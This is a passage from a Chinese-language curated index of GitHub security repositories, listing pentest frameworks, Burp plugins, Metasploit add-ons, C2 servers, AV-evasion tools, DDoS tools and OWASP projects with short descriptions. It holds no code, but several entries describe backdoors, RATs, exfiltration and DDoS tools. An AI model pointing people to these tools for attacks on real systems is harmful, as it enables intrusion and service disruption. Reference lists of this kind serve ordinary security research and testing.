[ct-open-source/tuya-convert](https://github.com/ct-open-source/tuya-convert) A collection of scripts to flash Tuya IoT devices to alternative firmwares - [**836**星][5d] [v33ru/iotsecurity101](https://github.com/v33ru/iotsecurity101) From IoT Pentesting to IoT Security - [**587**星][9m] [Py] [woj-ciech/danger-zone](https://github.com/woj-ciech/danger-zone) Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files. - [**491**星][18d] [Py] [iti/ics-security-tools](https://github.com/iti/ics-security-tools) Tools, tips, tricks, and more for exploring ICS Security. - [**461**星][5d] [Py] [rabobank-cdc/dettect](https://github.com/rabobank-cdc/dettect) Detect Tactics, Techniques & Combat Threats - [**330**星][1y] [Py] [vmware/liota](https://github.com/vmware/liota) - [**315**星][16d] [Java] [erudika/para](https://github.com/erudika/para) Open source back-end server for web, mobile and IoT. The backend for busy developers. (self-hosted or hosted) ### <a id="72bffacc109d51ea286797a7d5079392"></a>打印机 ### <a id="c9fd442ecac4e22d142731165b06b3fe"></a>路由器&&交换机 ### <a id="3d345feb9fee1c101aea3838da8cbaca"></a>嵌入式设备 - [**7547**星][8d] [Py] [threat9/routersploit](https://github.com/threat9/routersploit) Exploitation Framework for Embedded Devices *** ## <a id="01e638f09e44280ae9a1a95fc376edc5"></a>文章 ### <a id="a4a3bcead86d9f9f7977479dfe94797d"></a>新添加 # <a id="1233584261c0cd5224b6e90a98cc9a94"></a>渗透&&offensive&&渗透框架&&后渗透框架 *** ## <a id="5dd93fbc2f2ebc8d98672b2d95782af3"></a>工具 ### <a id="2e40f2f1df5d7f93a7de47bf49c24a0e"></a>未分类-Pentest - [**3051**星][4m] [Py] [spiderlabs/responder](https://github.com/spiderlabs/responder) LLMNR/NBT-NS/MDNS投毒,内置HTTP/SMB/MSSQL/FTP/LDAP认证服务器, 支持NTLMv1/NTLMv2/LMv2 - [**2058**星][2m] [C++] [lordnoteworthy/al-khaser](https://github.com/lordnoteworthy/al-khaser) 在野恶意软件使用的技术:虚拟机,仿真,调试器,沙盒检测。 - 重复区段: [恶意代码->工具](#e2fd0947924229d7de24b9902e1f54a0) | - [**1957**星][5d] [chaitin/xray](https://github.com/chaitin/xray) xray 安全评估工具 | 使用之前务必先阅读文档 - [**1468**星][6d] [C] [ufrisk/pcileech](https://github.com/ufrisk/pcileech) DMA攻击工具。通过 PCIe 硬件设备使用 DMA,直接读写目标系统的内存。目标系统不需要安装驱动。 - [**1421**星][5m] [yadox666/the-hackers-hardware-toolkit](https://github.com/yadox666/the-hackers-hardware-toolkit) 用于Red Team、渗透、安全研究的最佳硬件产品集合 - [**1398**星][4d] [Py] [ekultek/whatwaf](https://github.com/ekultek/whatwaf) 检测并绕过WAF和保护系统 - [**1223**星][4m] [Py] [owtf/owtf](https://github.com/owtf/owtf) 进攻性 Web 测试框架。着重于 OWASP + PTES,尝试统合强大的工具,提高渗透测试的效率。大部分以Python 编写 - [**1020**星][1m] [C] [bt3gl/pentesting-toolkit](https://github.com/bt3gl/Pentesting-Toolkit) 渗透测试,CTF和战争游戏的工具收集 - [**952**星][4m] [Py] [hatriot/zarp](https://github.com/hatriot/zarp) 网络攻击工具,主要是本地网络攻击 - [**938**星][2m] [Py] [d4vinci/one-lin3r](https://github.com/d4vinci/one-lin3r) 轻量级框架,提供在渗透测试中需要的所有one-liners - [**850**星][8m] [JS] [serpicoproject/serpico](https://github.com/serpicoproject/serpico) 渗透测试报告生成和协作工具 - [**820**星][2m] [Py] [jeffzh3ng/fuxi](https://github.com/jeffzh3ng/fuxi) 渗透测试平台 - [**809**星][17d] [Py] [jivoi/pentest](https://github.com/jivoi/pentest) 渗透测试工具 - [**775**星][8m] [Py] [gkbrk/slowloris](https://github.com/gkbrk/slowloris) HTTP DoS 服务攻击,主要影响多线程服务器 - [**722**星][19d] [voorivex/pentest-guide](https://github.com/voorivex/pentest-guide) 基于OWASP的渗透测试指南,包括测试案例,资源和示例。 - [**713**星][6m] [leezj9671/pentest_interview](https://github.com/leezj9671/pentest_interview) 个人准备渗透测试和安全面试的经验之谈,和去部分厂商的面试题,干货真的满满~ - [**685**星][4d] [Py] [gwen001/pentest-tools](https://github.com/gwen001/pentest-tools) 日常使用的渗透工具集合 - [**624**星][10m] [Py] [epsylon/ufonet](https://github.com/epsylon/ufonet) 用于发起DDoS和DoS攻击的工具包。 - [**613**星][1m] [Ruby] [hackplayers/evil-winrm](https://github.com/hackplayers/evil-winrm) 用户Hacking/渗透的终极WinRM shell - [**545**星][t] [C++] [danielkrupinski/osiris](https://github.com/danielkrupinski/osiris) 开源培训软件/“反恐精英:全球攻势”游戏作弊工具。设计为内部作弊-可将动态链接库(DLL)加载到游戏过程中 - [**514**星][25d] [PS] [s3cur3th1ssh1t/winpwn](https://github.com/S3cur3Th1sSh1t/WinPwn) 内部Windows渗透测试/与安全的自动化 - [**502**星][7d] [netbiosx/checklists](https://github.com/netbiosx/checklists) 参与的各种渗透测试的清单 - [**491**星][1y] [Shell] [leonteale/pentestpackage](https://github.com/leonteale/pentestpackage) 一整套我已经制作或经常使用的渗透脚本 - [**489**星][11m] [Ruby] [sidaf/homebrew-pentest](https://github.com/sidaf/homebrew-pentest) 一个包含一些Homebrew formulas的Tap,包含与渗透测试相关的工具。 - [**474**星][8m] [Java] [alpha1e0/pentestdb](https://github.com/alpha1e0/pentestdb) WEB渗透测试数据库 - [**472**星][11m] [PHP] [l3m0n/pentest_tools](https://github.com/l3m0n/pentest_tools) 收集一些小型实用的工具 - [**464**星][3m] [C++] [fsecurelabs/c3](https://github.com/FSecureLABS/C3) 一个用于快速定制C2通道原型的框架,同时仍提供与现有攻击性工具包的集成。 - [**463**星][4m] [mel0day/redteam-bcs](https://github.com/mel0day/redteam-bcs) BCS(北京网络安全大会)2019 红队行动会议重点内容 - [**451**星][8m] [C++] [rek7/mxtract](https://github.com/rek7/mxtract) 一个基于linux的开源工具,用于分析和转储内存。 - [**440**星][2m] [Py] [admintony/prepare-for-awd](https://github.com/admintony/prepare-for-awd) AWD攻防赛脚本集合 - [**435**星][10m] [Go] [amyangxyz/assassingo](https://github.com/amyangxyz/assassingo) 一个可扩展的并发信息收集和漏洞扫描框架,具有基于WebSocket的Web GUI。 - [**403**星][2d] [Py] [christruncer/pentestscripts](https://github.com/christruncer/pentestscripts) 渗透脚本 - [**401**星][2m] [Py] [clr2of8/dpat](https://github.com/clr2of8/dpat) 域密码审核工具 - [**396**星][4m] [ansjdnakjdnajkd/ios](https://github.com/ansjdnakjdnajkd/ios) iOS渗透测试最有用的工具 - [**395**星][8d] [PS] [d0nkeys/redteam](https://github.com/d0nkeys/redteam) Red Team 脚本 - [**394**星][1y] [Py] [cr4shcod3/pureblood](https://github.com/cr4shcod3/pureblood) 为黑客/渗透测试/漏洞赏金创建的渗透测试框架 - [**392**星][4m] [Py] [xuanhun/pythonhackingbook1](https://github.com/xuanhun/pythonhackingbook1) Python黑客编程之极速入门 - [**387**星][5m] [C#] [bitsadmin/nopowershell](https://github.com/bitsadmin/nopowershell) 使用C#"重写"的PowerShell, 支持执行与PowerShell类似的命令, 然而对所有的PowerShell日志机制都不可见 - [**381**星][9m] [C] [ridter/pentest](https://github.com/ridter/pentest) 渗透工具 - [**379**星][7m] [unprovable/pentesthardware](https://github.com/unprovable/pentesthardware) 公开笔记整理 - [**353**星][1y] [PS] [rootclay/powershell-attack-guide](https://github.com/rootclay/powershell-attack-guide) Powershell攻击指南----黑客后渗透之道 - [**351**星][3m] [Shell] [maldevel/pentestkit](https://github.com/maldevel/pentestkit) 渗透脚本和工具 - [**347**星][1m] [Py] [ym2011/pest](https://github.com/ym2011/PEST) 渗透脚本 - [**346**星][11m] [Py] [darkspiritz/darkspiritz](https://github.com/darkspiritz/darkspiritz) 适用于Linux,MacOS和Windows系统的渗透测试框架。 - [**344**星][1m] [stardustsky/saidict](https://github.com/stardustsky/saidict) 弱口令,敏感目录,敏感文件等渗透测试常用攻击字典 - [**340**星][1y] [Java] [rub-nds/ws-attacker](https://github.com/rub-nds/ws-attacker) Web服务渗透测试框架,模块化。 - [**331**星][1m] [Py] [m8r0wn/nullinux](https://github.com/m8r0wn/nullinux) SMB null 会话识别和枚举工具 - [**323**星][3m] [PS] [kmkz/pentesting](https://github.com/kmkz/pentesting) 渗透测试技巧 - [**322**星][4m] [HTML] [koutto/jok3r](https://github.com/koutto/jok3r) 一个Python3 CLI应用程序,旨在帮助渗透测试人员进行网络基础结构和Web黑盒安全性测试。 - [**310**星][7m] [ring04h/pentest](https://github.com/ring04h/pentest) 渗透测试用到的东东 - [**305**星][3m] [Ruby] [fozavci/viproy-voipkit](https://github.com/fozavci/viproy-voipkit) VoIP渗透测试工具和 Metasploit 框架 - 重复区段: [渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) | - [**297**星][2m] [Py] [bishopfox/eyeballer](https://github.com/bishopfox/eyeballer) 用于大型网络渗透测试中需要从大量基于Web的主机中找到“有趣的”目标 - [**295**星][2m] [Lua] [pentesteracademy/patoolkit](https://github.com/pentesteracademy/patoolkit) 一组流量分析插件,用于将Wireshark的功能从微分析工具和协议解析器扩展到宏分析器和威胁猎人。 - [**289**星][5d] [Java] [mr-xn/penetration_testing_poc](https://github.com/mr-xn/penetration_testing_poc) 渗透测试有关的POC、EXP、脚本、提权、小工具等 - [**287**星][1y] [C++] [paranoidninja/pandoras-box](https://github.com/paranoidninja/pandoras-box) 渗透和Red Team脚本 - [**280**星][12d] [Go] [rmikehodges/hidensneak](https://github.com/rmikehodges/hidensneak) 通过提供快速部署,管理和关闭各种云服务的界面,协助管理渗透测试人员的攻击基础架构 - [**273**星][19d] [Py] [elevenpaths/homepwn](https://github.com/elevenpaths/homepwn) HomePwn - Swiss Army Knife for Pentesting of IoT Devices - [**262**星][4m] [Py] [giantbranch/python-hacker-code](https://github.com/giantbranch/python-hacker-code) 《python黑帽子:黑客与渗透测试编程之道》代码及实验文件,字典等 - [**259**星][1m] [anyeduke/enterprise-security-skill](https://github.com/anyeduke/enterprise-security-skill) 用于记录企业安全规划,建设,运营,攻防的相关资源 - [**250**星][5d] [PS] [sdcampbell/internal-pentest-playbook](https://github.com/sdcampbell/internal-pentest-playbook) Internal Network Penetration Test Playbook - [**246**星][3m] [Shell] [leviathan36/kaboom](https://github.com/leviathan36/kaboom) An automated pentest tool - [**231**星][9m] [Go] [stevenaldinger/decker](https://github.com/stevenaldinger/decker) Declarative penetration testing orchestration framework - [**220**星][] [JS] [giper45/dockersecurityplayground](https://github.com/giper45/dockersecurityplayground) A Microservices-based framework for the study of Network Security and Penetration Test techniques - [**219**星][6m] [Py] [mgeeky/tomcatwardeployer](https://github.com/mgeeky/tomcatwardeployer) Apache Tomcat auto WAR deployment & pwning penetration testing tool. - [**206**星][3m] [Shell] [keepwannabe/remot3d](https://github.com/keepwannabe/remot3d) is a simple tool created for large pentesters as well as just for the pleasure of defacers to control server by backdoors - [**203**星][2m] [Ruby] [vonahisec/leprechaun](https://github.com/vonahisec/leprechaun) This tool is used to map out the network data flow to help penetration testers identify potentially valuable targets. - [**200**星][11m] [Py] [infamoussyn/rogue](https://github.com/infamoussyn/rogue) An extensible toolkit providing penetration testers an easy-to-use platform to deploy Access Points during penetration testing and red team engagements. ### <a id="9081db81f6f4b78d5c263723a3f7bd6d"></a>收集 - [**923**星][9m] [C] [0x90/wifi-arsenal](https://github.com/0x90/wifi-arsenal) WiFi arsenal - [**822**星][3m] [Shell] [shr3ddersec/shr3dkit](https://github.com/shr3ddersec/shr3dkit) Red Team Tool Kit - [**540**星][7m] [Py] [0xdea/tactical-exploitation](https://github.com/0xdea/tactical-exploitation) 渗透测试辅助工具包. Python/PowerShell脚本 ### <a id="2051fd9e171f2698d8e7486e3dd35d87"></a>渗透多合一&&渗透框架 - [**5062**星][5m] [PS] [empireproject/empire](https://github.com/EmpireProject/Empire) 后渗透框架. Windows客户端用PowerShell, Linux/OSX用Python. 之前PowerShell Empire和Python EmPyre的组合 - [**4752**星][13d] [Py] [manisso/fsociety](https://github.com/manisso/fsociety) fsociety Hacking Tools Pack – A Penetration Testing Framework - [**3427**星][1m] [PS] [samratashok/nishang](https://github.com/samratashok/nishang) 渗透框架,脚本和Payload收集,主要是PowerShell,涵盖渗透的各个阶段 - [**3154**星][t] [Shell] [1n3/sn1per](https://github.com/1n3/sn1per) 自动化渗透测试框架 - [**3136**星][2m] [Py] [byt3bl33d3r/crackmapexec](https://github.com/byt3bl33d3r/crackmapexec) 后渗透工具,自动化评估大型Active Directory网络的安全性 - [**2995**星][18d] [Py] [guardicore/monkey](https://github.com/guardicore/monkey) 自动化渗透测试工具, 测试数据中心的弹性, 以防范周边(perimeter)泄漏和内部服务器感染 - [**2840**星][8m] [C#] [quasar/quasarrat](https://github.com/quasar/quasarrat) Remote Administration Tool for Windows - [**2421**星][5d] [Py] [infobyte/faraday](https://github.com/infobyte/faraday) 渗透测试和漏洞管理平台 - [**1527**星][19d] [Py] [zerosum0x0/koadic](https://github.com/zerosum0x0/koadic) 类似于Meterpreter、Powershell Empire 的post-exploitation rootkit,区别在于其大多数操作都是由 Windows 脚本主机 JScript/VBScript 执行 - [**1096**星][11m] [Py] [secforce/sparta](https://github.com/secforce/sparta) 网络基础架构渗透测试 - [**961**星][4m] [Py] [0xinfection/tidos-framework](https://github.com/0xInfection/TIDoS-Framework) Web App渗透测试框架, 攻击性, 手动 - [**928**星][1y] [Py] [m4n3dw0lf/pythem](https://github.com/m4n3dw0lf/pythem) 多功能渗透测试框架 - [**521**星][t] [Py] [gyoisamurai/gyoithon](https://github.com/gyoisamurai/gyoithon) 使用机器学习的成长型渗透测试工具 ### <a id="fc8737aef0f59c3952d11749fe582dac"></a>自动化 - [**1881**星][5m] [Shell] [arismelachroinos/lscript](https://github.com/arismelachroinos/lscript) 自动化无线渗透和Hacking 任务的脚本 - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) | - [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener - 重复区段: [渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) |[侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |[Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) | - [**1688**星][3m] [Py] [rootm0s/winpwnage](https://github.com/rootm0s/winpwnage) UAC bypass, Elevate, Persistence and Execution methods ### <a id="3ae4408f4ab03f99bab9ef9ee69642a8"></a>数据渗透&&DataExfiltration - [**1065**星][1m] [C] [quiet/quiet](https://github.com/quiet/quiet) Transmit data with sound. Includes binaries for soundcards and .wav files. - [**469**星][4m] [Py] [viralmaniar/powershell-rat](https://github.com/viralmaniar/powershell-rat) Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment. ### <a id="adfa06d452147ebacd35981ce56f916b"></a>横向渗透 ### <a id="39e9a0fe929fffe5721f7d7bb2dae547"></a>Burp #### <a id="6366edc293f25b57bf688570b11d6584"></a>收集 - [**1982**星][1y] [BitBake] [1n3/intruderpayloads](https://github.com/1n3/intruderpayloads) A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists. - [**1108**星][2m] [snoopysecurity/awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions) Burp扩展收集 #### <a id="5b761419863bc686be12c76451f49532"></a>未分类-Burp - [**1112**星][1y] [Py] [bugcrowd/hunt](https://github.com/bugcrowd/HUNT) Burp和ZAP的扩展收集 - [**917**星][5d] [Batchfile] [mr-xn/burpsuite-collections](https://github.com/mr-xn/burpsuite-collections) BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程,欢迎添砖加瓦---burpsuite-pro burpsuite-extender burpsuite cracked-version hackbar hacktools fuzzing fuzz-testing burp-plugin burp-extensions bapp-store brute-force-attacks brute-force-passwords waf sqlmap jar - [**715**星][1y] [Java] [d3vilbug/hackbar](https://github.com/d3vilbug/hackbar) HackBar plugin for Burpsuite - [**663**星][9m] [Java] [vulnerscom/burp-vulners-scanner](https://github.com/vulnerscom/burp-vulners-scanner) Vulnerability scanner based on vulners.com search API - [**605**星][9m] [Java] [c0ny1/chunked-coding-converter](https://github.com/c0ny1/chunked-coding-converter) Burp suite 分块传输辅助插件 - [**584**星][1y] [Java] [federicodotta/brida](https://github.com/federicodotta/brida) The new bridge between Burp Suite and Frida! - [**510**星][2m] [Java] [wagiro/burpbounty](https://github.com/wagiro/burpbounty) Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface. - [**496**星][2m] [Py] [romanzaikin/burpextension-whatsapp-decryption-checkpoint](https://github.com/romanzaikin/burpextension-whatsapp-decryption-checkpoint) This tool was created during our research at Checkpoint Software Technologies on Whatsapp Protocol (This repository will be updated after BlackHat 2019) - [**445**星][6m] [Py] [albinowax/activescanplusplus](https://github.com/albinowax/activescanplusplus) ActiveScan++ Burp Suite Plugin - [**423**星][5m] [Java] [bit4woo/recaptcha](https://github.com/bit4woo/recaptcha) reCAPTCHA = REcognize CAPTCHA: A Burp Suite Extender that recognize CAPTCHA and use for intruder payload 自动识别图形验证码并用于burp intruder爆破模块的插件 - [**410**星][8m] [Java] [nccgroup/burpsuitehttpsmuggler](https://github.com/nccgroup/burpsuitehttpsmuggler) A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques - [**381**星][1y] [Py] [rhinosecuritylabs/sleuthql](https://github.com/rhinosecuritylabs/sleuthql) Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap. - [**378**星][3m] [Java] [nccgroup/autorepeater](https://github.com/nccgroup/autorepeater) Automated HTTP Request Repeating With Burp Suite - [**366**星][13d] [Java] [portswigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler) an extension for Burp Suite designed to help you launch HTTP Request Smuggling attack - [**364**星][4d] [Kotlin] [portswigger/turbo-intruder](https://github.com/portswigger/turbo-intruder) Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. - [**359**星][5m] [Java] [bit4woo/domain_hunter](https://github.com/bit4woo/domain_hunter) A Burp Suite Extender that try to find sub-domain, similar-domain and related-domain of an organization, not only a domain! 利用burp收集整个企业、组织的域名(不仅仅是单个主域名)的插件 - [**336**星][13d] [Java] [bit4woo/knife](https://github.com/bit4woo/knife) A burp extension that add some useful function to Context Menu 添加一些右键菜单让burp用起来更顺畅 - [**310**星][1y] [Java] [ebryx/aes-killer](https://github.com/ebryx/aes-killer) Burp plugin to decrypt AES Encrypted traffic of mobile apps on the fly - [**303**星][6d] [Java] [ilmila/j2eescan](https://github.com/ilmila/j2eescan) J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications. - [**301**星][1y] [Java] [elkokc/reflector](https://github.com/elkokc/reflector) Burp 插件,浏览网页时实时查找反射 XSS - [**299**星][1y] [Java] [vmware/burp-rest-api](https://github.com/vmware/burp-rest-api) REST/JSON API to the Burp Suite security tool. - [**298**星][12m] [Shell] [yw9381/burp_suite_doc_zh_cn](https://github.com/yw9381/burp_suite_doc_zh_cn) 这是基于Burp Suite官方文档翻译而来的中文版文档 - [**273**星][2m] [Py] [quitten/autorize](https://github.com/quitten/autorize) Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests - [**257**星][3m] [Py] [rhinosecuritylabs/iprotate_burp_extension](https://github.com/rhinosecuritylabs/iprotate_burp_extension) Extension for Burp Suite which uses AWS API Gateway to rotate your IP on every request. - [**250**星][30d] [Java] [c0ny1/jsencrypter](https://github.com/c0ny1/jsencrypter) 一个用于加密传输爆破的Burp Suite插件 - [**246**星][5m] [Py] [initroot/burpjslinkfinder](https://github.com/initroot/burpjslinkfinder) Burp Extension for a passive scanning JS files for endpoint links. - [**244**星][3m] [Java] [c0ny1/passive-scan-client](https://github.com/c0ny1/passive-scan-client) Burp被动扫描流量转发插件 - [**238**星][2m] [Java] [samlraider/samlraider](https://github.com/samlraider/samlraider) SAML2 Burp Extension - [**235**星][1y] [Java] [difcareer/sqlmap4burp](https://github.com/difcareer/sqlmap4burp) sqlmap embed in burpsuite - [**230**星][1y] [Py] [audibleblink/doxycannon](https://github.com/audibleblink/doxycannon) 为一堆OpenVPN文件分别创建Docker容器, 每个容器开启SOCKS5代理服务器并绑定至Docker主机端口, 再结合使用Burp或ProxyChains, 构建私有的Botnet - [**225**星][6m] [Perl] [modzero/mod0burpuploadscanner](https://github.com/modzero/mod0burpuploadscanner) HTTP file upload scanner for Burp Proxy - [**219**星][9m] [Py] [teag1e/burpcollector](https://github.com/teag1e/burpcollector) 通过BurpSuite来构建自己的爆破字典,可以通过字典爆破来发现隐藏资产。 - [**209**星][3m] [Java] [h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) ZAP/Burp plugin that generate script to reproduce a specific HTTP request (Intended for fuzzing or scripted attacks) ### <a id="8e7a6a74ff322cbf2bad59092598de77"></a>Metasploit #### <a id="01be61d5bb9f6f7199208ff0fba86b5d"></a>未分类-metasploit - [**19127**星][4d] [Ruby] [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework) Metasploit Framework - [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) |[侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |[Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) | - [**1302**星][1y] [Shell] [dana-at-cp/backdoor-apk](https://github.com/dana-at-cp/backdoor-apk) backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only. - [**742**星][16d] [C] [rapid7/metasploit-payloads](https://github.com/rapid7/metasploit-payloads) Unified repository for different Metasploit Framework payloads - [**732**星][3m] [Java] [isafeblue/trackray](https://github.com/isafeblue/trackray) 溯光 (TrackRay) 3 beta⚡渗透测试框架(资产扫描|指纹识别|暴力破解|网页爬虫|端口扫描|漏洞扫描|代码审计|AWVS|NMAP|Metasploit|SQLMap) - [**534**星][4d] [Shell] [r00t-3xp10it/venom](https://github.com/r00t-3xp10it/venom) venom - shellcode generator/compiler/handler (metasploit) - [**456**星][5m] [Py] [cchio/deep-pwning](https://github.com/cchio/deep-pwning) 一个轻量级的框架,用于试验机器学习模型,目的是评估其对主动攻击者的鲁棒性 - [**413**星][6m] [Ruby] [praetorian-code/purple-team-attack-automation](https://github.com/praetorian-code/purple-team-attack-automation) Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs - [**310**星][2m] [Py] [3ndg4me/autoblue-ms17-010](https://github.com/3ndg4me/autoblue-ms17-010) This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010 - [**310**星][11m] [Ruby] [darkoperator/metasploit-plugins](https://github.com/darkoperator/metasploit-plugins) Plugins for Metasploit Framework - [**305**星][3m] [Ruby] [fozavci/viproy-voipkit](https://github.com/fozavci/viproy-voipkit) VoIP渗透测试工具和 Metasploit 框架 - 重复区段: [渗透->工具->未分类-Pentest](#2e40f2f1df5d7f93a7de47bf49c24a0e) | - [**279**星][3m] [Vue] [zerx0r/kage](https://github.com/Zerx0r/Kage) Kage is Graphical User Interface for Metasploit Meterpreter and Session Handler ### <a id="b1161d6c4cb520d0cd574347cd18342e"></a>免杀&&躲避AV检测 - [**1032**星][5m] [C] [govolution/avet](https://github.com/govolution/avet) 免杀工具 - [**733**星][10m] [Py] [mr-un1k0d3r/dkmc](https://github.com/mr-un1k0d3r/dkmc) DKMC - Dont kill my cat - Malicious payload evasion tool - [**686**星][7m] [Py] [paranoidninja/carboncopy](https://github.com/paranoidninja/carboncopy) A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux - [**472**星][18d] [Go] [arvanaghi/checkplease](https://github.com/arvanaghi/checkplease) Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust. - [**316**星][1m] [C#] [ch0pin/aviator](https://github.com/ch0pin/aviator) Antivirus evasion project - [**302**星][1y] [Py] [two06/inception](https://github.com/two06/inception) Provides In-memory compilation and reflective loading of C# apps for AV evasion. - [**276**星][2m] [C#] [hackplayers/salsa-tools](https://github.com/hackplayers/salsa-tools) Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY and AV bypass, AMSI patched ### <a id="98a851c8e6744850efcb27b8e93dff73"></a>C&C - [**2490**星][4m] [Go] [ne0nd0g/merlin](https://github.com/ne0nd0g/merlin) Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang. - [**1826**星][6m] [C++] [iagox86/dnscat2](https://github.com/iagox86/dnscat2) 在 DNS 协议上创建加密的 C&C channel - [**1110**星][1y] [Py] [byt3bl33d3r/gcat](https://github.com/byt3bl33d3r/gcat) A PoC backdoor that uses Gmail as a C&C server - [**994**星][2m] [C#] [cobbr/covenant](https://github.com/cobbr/covenant) Covenant is a collaborative .NET C2 framework for red teamers. - [**633**星][11m] [Py] [mehulj94/braindamage](https://github.com/mehulj94/braindamage) Remote administration tool which uses Telegram as a C&C server - [**596**星][19d] [Py] [trustedsec/trevorc2](https://github.com/trustedsec/trevorc2) 通过正常的可浏览的网站隐藏 C&C 指令的客户端/服务器模型,因为时间间隔不同,检测变得更加困难,并且获取主机数据时不会使用 POST 请求 - [**320**星][1y] [C#] [spiderlabs/dohc2](https://github.com/spiderlabs/dohc2) DoHC2 allows the ExternalC2 library from Ryan Hanson ( - [**283**星][t] [PS] [nettitude/poshc2](https://github.com/nettitude/poshc2) Python Server for PoshC2 - [**280**星][4d] [PS] [nettitude/poshc2](https://github.com/nettitude/PoshC2) Python Server for PoshC2 - [**207**星][1y] [C#] [damonmohammadbagher/nativepayload_dns](https://github.com/damonmohammadbagher/nativepayload_dns) 使用DNS流量传输Payload,绕过杀软。C#编写 - [**201**星][1y] [Py] [sec-bit/awesome-buggy-erc20-tokens](https://github.com/sec-bit/awesome-buggy-erc20-tokens) A Collection of Vulnerabilities in ERC20 Smart Contracts With Tokens Affected ### <a id="a0897294e74a0863ea8b83d11994fad6"></a>DDOS - [**2466**星][1m] [C++] [pavel-odintsov/fastnetmon](https://github.com/pavel-odintsov/fastnetmon) 快速 DDoS 检测/分析工具,支持 sflow/netflow/mirror - [**1268**星][4d] [Shell] [mitchellkrogza/nginx-ultimate-bad-bot-blocker](https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker) Nginx Block Bad Bots, Spam Referrer Blocker, Vulnerability Scanners, User-Agents, Malware, Adware, Ransomware, Malicious Sites, with anti-DDOS, Wordpress Theme Detector Blocking and Fail2Ban Jail for Repeat Offenders - [**858**星][3m] [Py] [649/memcrashed-ddos-exploit](https://github.com/649/memcrashed-ddos-exploit) DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API - 重复区段: [侦察->工具->Shodan](#18c7c1df2e6ae5e9135dfa2e4eb1d4db) | - [**510**星][3m] [JS] [acmesec/pocbox](https://github.com/Acmesec/PoCBox) 赏金猎人的脆弱性测试辅助平台 - [**476**星][16d] [JS] [codemanki/cloudscraper](https://github.com/codemanki/cloudscraper) Node.js library to bypass cloudflare's anti-ddos page - [**468**星][7m] [Shell] [jgmdev/ddos-deflate](https://github.com/jgmdev/ddos-deflate) Fork of DDoS Deflate with fixes, improvements and new features. - [**385**星][1y] [C] [markus-go/bonesi](https://github.com/markus-go/bonesi) BoNeSi - the DDoS Botnet Simulator - [**301**星][4m] [Shell] [anti-ddos/anti-ddos](https://github.com/anti-ddos/Anti-DDOS) - [**265**星][1y] [Py] [wenfengshi/ddos-dos-tools](https://github.com/wenfengshi/ddos-dos-tools) some sort of ddos-tools ### <a id="8e1069b2bce90b87eea762ee3d0935d8"></a>OWASP - [**11306**星][2d] [Py] [owasp/cheatsheetseries](https://github.com/owasp/cheatsheetseries) The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics. - [**5084**星][7d] [HTML] [owasp/owasp-mstg](https://github.com/owasp/owasp-mstg) 关于移动App安全开发、测试和逆向的相近手册 - [**2434**星][13d] [Go] [owasp/amass](https://github.com/owasp/amass) In-depth Attack Surface Mapping and Asset Discovery - [**1964**星][10d] [Perl] [spiderlabs/owasp-modsecurity-crs](https://github.com/spiderlabs/owasp-modsecurity-crs) OWASP ModSecurity Core Rule Set (CRS) Project (Official Repository) - [**1417**星][3m] [HTML] [owasp/top10](https://github.com/owasp/top10) Official OWASP Top 10 Document Repository - [**1056**星][3m] [HTML] [owasp/nodegoat](https://github.com/owasp/nodegoat) 学习OWASP安全威胁Top10如何应用到Web App的,以及如何处理 - [**752**星][2d] [Java] [owasp/securityshepherd](https://github.com/owasp/securityshepherd) Web and mobile application security training platform - [**698**星][7d] [HTML] [owasp/asvs](https://github.com/owasp/asvs) Application Security Verification Standard - [**625**星][9d] [Py] [zdresearch/owasp-nettacker](https://github.com/zdresearch/OWASP-Nettacker) Automated Penetration Testing Framework - [**559**星][6d] [Shell] 